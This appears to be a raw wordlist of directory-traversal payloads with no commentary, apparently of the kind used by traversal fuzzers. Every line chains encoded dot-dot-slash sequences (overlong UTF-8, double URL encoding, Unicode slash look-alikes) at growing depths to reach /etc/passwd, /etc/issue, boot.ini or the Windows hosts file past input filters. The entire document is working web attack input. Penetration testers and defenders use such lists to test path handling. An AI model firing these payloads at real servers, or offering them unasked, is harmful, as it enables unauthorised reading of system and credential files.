-%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216passwd -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216etc%u2216issue -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216boot.ini -%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216%c0%ee%c0%ee%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ee%c0%ee%uEFC8etc%uEFC8passwd -%c0%ee%c0%ee%uEFC8etc%uEFC8issue -%c0%ee%c0%ee%uEFC8boot.ini -%c0%ee%c0%ee%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8passwd -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8issue -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8boot.ini -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8passwd -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8issue -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8boot.ini -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8passwd -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8issue -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8boot.ini -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8passwd -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8issue -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8boot.ini -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8passwd -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8etc%uEFC8issue -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8boot.ini -%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8%c0%ee%c0%ee%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ee%c0%ee%uF025etc%uF025passwd -%c0%ee%c0%ee%uF025etc%uF025issue -%c0%ee%c0%ee%uF025boot.ini -%c0%ee%c0%ee%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025passwd -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025issue -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025boot.ini -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025passwd -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025issue -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025boot.ini -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025passwd -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025issue -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025boot.ini -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025passwd -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025issue -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025boot.ini -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025passwd -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025etc%uF025issue -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025boot.ini -%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025%c0%ee%c0%ee%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ee%c0%ee%%32%%66etc%%32%%66passwd -%c0%ee%c0%ee%%32%%66etc%%32%%66issue -%c0%ee%c0%ee%%32%%66boot.ini -%c0%ee%c0%ee%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66passwd -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66issue -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66boot.ini -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66passwd -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66issue -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66boot.ini -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66passwd -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66issue -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66boot.ini -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66passwd -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66issue -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66boot.ini -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66passwd -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66etc%%32%%66issue -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66boot.ini -%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66%c0%ee%c0%ee%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ee%c0%ee%%35%%63etc%%35%%63passwd -%c0%ee%c0%ee%%35%%63etc%%35%%63issue -%c0%ee%c0%ee%%35%%63boot.ini -%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63passwd -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63issue -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63boot.ini -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63passwd -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63issue -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63boot.ini -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63passwd -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63issue -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63boot.ini -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63passwd -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63issue -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63boot.ini -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63passwd -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63etc%%35%%63issue -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63boot.ini -%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63%c0%ee%c0%ee%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ee%c0%ee%e0%80%afetc%e0%80%afpasswd -%c0%ee%c0%ee%e0%80%afetc%e0%80%afissue -%c0%ee%c0%ee%e0%80%afboot.ini -%c0%ee%c0%ee%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afpasswd -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afissue -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afboot.ini -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afpasswd -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afissue -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afboot.ini -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afpasswd -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afissue -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afboot.ini -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afpasswd -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afissue -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afboot.ini -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afpasswd -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afetc%e0%80%afissue -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afboot.ini -%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%af%c0%ee%c0%ee%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ee%c0%ee%25c1%259cetc%25c1%259cpasswd -%c0%ee%c0%ee%25c1%259cetc%25c1%259cissue -%c0%ee%c0%ee%25c1%259cboot.ini -%c0%ee%c0%ee%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cpasswd -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cissue -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cboot.ini -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cpasswd -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cissue -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cboot.ini -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cpasswd -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cissue -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cboot.ini -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cpasswd -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cissue -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cboot.ini -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cpasswd -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cetc%25c1%259cissue -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cboot.ini -%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259c%c0%ee%c0%ee%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ee%c0%ee%25c0%25afetc%25c0%25afpasswd -%c0%ee%c0%ee%25c0%25afetc%25c0%25afissue -%c0%ee%c0%ee%25c0%25afboot.ini -%c0%ee%c0%ee%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afpasswd -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afissue -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afboot.ini -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afpasswd -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afissue -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afboot.ini -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afpasswd -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afissue -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afboot.ini -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afpasswd -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afissue -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afboot.ini -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afpasswd -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afetc%25c0%25afissue -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afboot.ini -%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25af%c0%ee%c0%ee%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afissue -%c0%ee%c0%ee%f0%80%80%afboot.ini -%c0%ee%c0%ee%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afissue -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afboot.ini -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afissue -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afboot.ini -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afpasswd 